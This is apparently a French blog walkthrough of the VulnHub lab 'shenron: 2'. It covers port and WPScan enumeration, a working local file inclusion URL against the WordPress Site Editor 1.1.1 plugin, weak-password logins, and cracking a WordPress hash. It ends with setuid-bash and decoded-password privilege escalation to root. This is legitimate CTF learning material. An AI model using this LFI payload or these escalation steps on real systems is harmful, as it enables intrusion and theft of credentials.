Le précédent de la série était pas mal alors j’ai continué sur ce shenron: 2 de VulnHub.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Nmap scan report for 192.168.56.61
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4a476b4648c5d78f30925b0c2ba474ae (RSA)
| 256 b04ed64cc24e1505c4211d697df2dc79 (ECDSA)
|_ 256 1bc0667a65689b358c63d3b9d25bf01c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Highlights by HTML5 UP
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: shenron-2 – Just another WordPress site
|_http-generator: WordPress 5.7
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.41 (Ubuntu)
Une énumération sur le port 80 ne ressort rien d’intéressant. Sur le port 8080 on trouve en revanche un Wordpress configuré pour le nom d’hôte shenron
.
I went for a LFI…
Je lance WPscan dessus :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
$ docker run --add-host shenron:192.168.56.61 -it --rm wpscanteam/wpscan --url http://shenron:8080/ -e ap,at,cb,dbe --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://shenron:8080/ [192.168.56.61]
[+] Started: Thu Nov 17 19:23:00 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://shenron:8080/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://shenron:8080/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://shenron:8080/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://shenron:8080/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7 identified (Insecure, released on 2021-03-09).
| Found By: Rss Generator (Passive Detection)
| - http://shenron:8080/index.php/feed/, <generator>https://wordpress.org/?v=5.7</generator>
| - http://shenron:8080/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.7</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://shenron:8080/wp-content/themes/twentynineteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://shenron:8080/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://shenron:8080/wp-content/themes/twentynineteen/style.css?ver=2.0
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://shenron:8080/wp-content/themes/twentynineteen/style.css?ver=2.0, Match: 'Version: 2.0'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:02:36 <============================================================================================================================> (101154 / 101154) 100.00% Time: 00:02:36
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://shenron:8080/wp-content/plugins/akismet/
| Last Updated: 2022-11-08T05:36:00.000Z
| Readme: http://shenron:8080/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.0.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.9 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/akismet/readme.txt
[+] classic-editor
| Location: http://shenron:8080/wp-content/plugins/classic-editor/
| Last Updated: 2022-11-04T19:15:00.000Z
| Readme: http://shenron:8080/wp-content/plugins/classic-editor/readme.txt
| [!] The version is out of date, the latest version is 1.6.2
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/classic-editor/, status: 200
|
| Version: 1.6 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/classic-editor/readme.txt
[+] elementor
| Location: http://shenron:8080/wp-content/plugins/elementor/
| Last Updated: 2022-11-13T14:00:00.000Z
| Readme: http://shenron:8080/wp-content/plugins/elementor/readme.txt
| [!] The version is out of date, the latest version is 3.8.1
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/elementor/, status: 200
|
| Version: 3.1.4 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/elementor/readme.txt
| Confirmed By: Javascript Comment (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/elementor/assets/js/admin-feedback.js, Match: 'elementor - v3.1.4'
[+] site-editor
| Location: http://shenron:8080/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
| Readme: http://shenron:8080/wp-content/plugins/site-editor/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/site-editor/, status: 200
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://shenron:8080/wp-content/plugins/site-editor/readme.txt
[+] Enumerating All Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:37 <==============================================================================================================================> (24905 / 24905) 100.00% Time: 00:00:37
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] twentynineteen
| Location: http://shenron:8080/wp-content/themes/twentynineteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://shenron:8080/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://shenron:8080/wp-content/themes/twentynineteen/style.css
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - http://shenron:8080/wp-content/themes/twentynineteen/, status: 500
|
| Version: 2.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://shenron:8080/wp-content/themes/twentynineteen/style.css, Match: 'Version: 2.0'
[+] twentytwenty
| Location: http://shenron:8080/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://shenron:8080/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://shenron:8080/wp-content/themes/twentytwenty/style.css
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://shenron:8080/wp-content/themes/twentytwenty/, status: 500
|
| Version: 1.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://shenron:8080/wp-content/themes/twentytwenty/style.css, Match: 'Version: 1.7'
[+] twentytwentyone
| Location: http://shenron:8080/wp-content/themes/twentytwentyone/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://shenron:8080/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.7
| Style URL: http://shenron:8080/wp-content/themes/twentytwentyone/style.css
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://shenron:8080/wp-content/themes/twentytwentyone/, status: 500
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://shenron:8080/wp-content/themes/twentytwentyone/style.css, Match: 'Version: 1.2'
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <=========================================================================================================================================> (71 / 71) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Nov 17 19:26:46 2022
[+] Requests Done: 126335
[+] Cached Requests: 24
[+] Data Sent: 33.678 MB
[+] Data Received: 34.107 MB
[+] Memory used: 512.668 MB
[+] Elapsed time: 00:03:46
Deux des plugins trouvent leur correspondance sur exploit-db :
WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated) - PHP webapps Exploit
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion - PHP webapps Exploit
Vu que l’on ne dispose pas d’identifiants pour le Wordpress, la seconde vulnérabilité est celle à tester. Il s’agit vraiment d’une faille d’inclusion toute bête.
J’arrive à dumper /etc/passwd
avec l’URL suivante :
http://192.168.56.61:8080/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
On retrouve les deux même utilisateurs quand dans l’épisode précédent :
1
2
shenron:x:1000:1000:shenron,,,:/home/shenron:/bin/bash
jenny:x:1001:1001::/home/jenny:/bin/bash
J’aimerais bien transformer cette LFI en RCE mais toutes les tentatives ont échouée :
message d’erreur étrange quand on tente d’utiliser les filtres PHP :
didn't load shortcodes pattern file
inclusions distantes qui n’aboutissent pas (tentative de bruteforcer les ports egress pour les protos http et ftp sans succès)
inclusion de ficjiers de logs en erreur
erreur aussi sur
/proc/self/environ
ou/proc/self/fd/X
… and all I got was a lousy password
Bref de quoi désespérer. Finalement il s’est avéré que cette chère jenny
a le mot de passe… jenny
.
Comme SSH est en écoute je récupère un shell et remarque que l’utilsateur shenron
fait partie du groupe sudo
. Il était de tout façon probable qu’il soit une étape du CTF.
Je ne trouve pas de fichiers particuliers pour shenron
(qui seraient par exemple en dehors de son dossier personnel) mais quand je recherche le fichier de configuration de Wordpress sur le système je m’apperçoit qu’il est dans son home (/home/shenron/wordpress/wp-config.php
)
1
2
3
4
5
6
7
8
/** The name of the database for WordPress */
define( 'DB_NAME', 'WordPressDB' );
/** MySQL database username */
define( 'DB_USER', 'user' );
/** MySQL database password */
define( 'DB_PASSWORD', 'User@123' );
Password reuse ? Non, su
me refuse le mot de passe. Je fouille donc dans la DB :
1
2
3
4
5
6
7
mysql> select user_login, user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| admin | $P$BHcDMQ33CZxfUoxktkBT/4G5va09AT. |
+------------+------------------------------------+
1 row in set (0.00 sec)
Je passe le hash à JtR qui m’indique que le mot de passe est… admin
.
Incroyable, j’ai pourtant tenté une attaque brute-force sur le xmlrpc du Wordpress avec WPscan
et il n’a rien détecté.
A la recherche des binaires setuid, j’en trouve un original :
-rwsr-xr-x 1 root root 16712 Apr 6 2021 /usr/bin/Execute
La commande strings
n’est pas présente sur le système mais hexdump
est présent. Je peux me faire une idée du fonctionnement du programme :
1
2
3
4
5
6
7
8
9
00002000 01 00 02 00 00 00 00 00 2f 75 73 72 2f 62 69 6e |......../usr/bin|
00002010 2f 63 70 20 2f 62 69 6e 2f 62 61 73 68 20 2f 6d |/cp /bin/bash /m|
00002020 6e 74 2f 62 61 73 68 3b 20 2f 75 73 72 2f 62 69 |nt/bash; /usr/bi|
00002030 6e 2f 63 68 6d 6f 64 20 37 37 37 20 2f 6d 6e 74 |n/chmod 777 /mnt|
00002040 2f 62 61 73 68 3b 20 2f 75 73 72 2f 62 69 6e 2f |/bash; /usr/bin/|
00002050 63 68 6f 77 6e 20 73 68 65 6e 72 6f 6e 3a 73 68 |chown shenron:sh|
00002060 65 6e 72 6f 6e 20 2f 6d 6e 74 2f 62 61 73 68 3b |enron /mnt/bash;|
00002070 20 2f 75 73 72 2f 62 69 6e 2f 63 68 6d 6f 64 20 | /usr/bin/chmod |
00002080 75 2b 73 20 2f 6d 6e 74 2f 62 61 73 68 00 00 00 |u+s /mnt/bash...|
Après exécution je trouve effetctivement un binaire setuid shenron
dans /mnt
:
-rwsrwxrwx 1 shenron shenron 1183448 Nov 18 03:27 bash
On l’exécute avec l’option -p
pour éviter que bash ne drop l’effective uid.
1
2
bash-5.0$ id
uid=1001(jenny) gid=1001(jenny) euid=1000(shenron) groups=1001(jenny)
On peut accéder au flag :
1
2
bash-5.0$ cat Desktop/local.txt
40252f8ffc3932fd2b5ae4995defb92
Du fait que seul l’effective uid correspond à shenron
, on ne peut pas effectuer certaines opérations :
1
2
bash-5.0$ sudo su
[sudo] password for jenny:
De même si on veut jouer sur la crontab de shenron :
1
2
bash-5.0$ crontab -l
no crontab for jenny
On peut tout de même créer le dossier .ssh
et rajouter notre clé publique dans authorized_keys
. En s’assurant que les permissions sur le groupe + tout le mode soit retirées on peut alors se connecter en SSH et avoir la vrai identité shenron
.
Malheureusement sudo -l
nécessite le mot de passe que l’on ne connait pas. L’utilisateur fait partie de différents groupes :
uid=1000(shenron) gid=1000(shenron) groups=1000(shenron),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)
Mais comme vu précédemment on ne peut pas utiliser sudo et les exécutables liés à lxd sont absents.
Les pribilèves du groupe adm permettent de lire les logs, notamment ceux d’authentification mais aucun mot de passe n’a fuité dedans.
Ca m’a traversé l’esprit de tenter une race condition sur le binaire Execute
vu plus tôt mais le dossier contenant l’exécutable n’est pas writable donc on ne peut pas supprimer le fichier, quand bien même on en est propriétaire.
DIDNTSEELOL
Finalement j’ai découvert un fichier caché .pass
qui était aussi dans le dossier Desktop
. Il semble contenir des données encodées.
1
2
$ echo KNUEK3SSN5HFG2CFNZJG6TSTNBCW4UTPJZJWQRLOKJXU4U3IIVXFE32OIBJWQRLOKJXU4I2TNBCW4UTPJZIGCU3TK5XVEZAK | base32 -d
ShEnRoNShEnRoNShEnRoNShEnRoNShEnRoN@ShEnRoN#ShEnRoNPaSsWoRd
C’était du base32 et avec cette longue chaine on peut finalement faire un sudo su et passer root.
1
2
3
4
5
6
7
8
9
root@shenron-2:~# cat root.txt
mmmm # mmmm
#" " # mm mmm m mm m mm mmm m mm " "#
"#mmm #" # #" # #" # #" " #" "# #" # m"
"# # # #"""" # # # # # # # """ m"
"mmm#" # # "#mm" # # # "#m#" # # m#mmmm
Your Root Flag Is Here :- a89604e285437f789ff278d2239aea02
Publié le 18 novembre 2022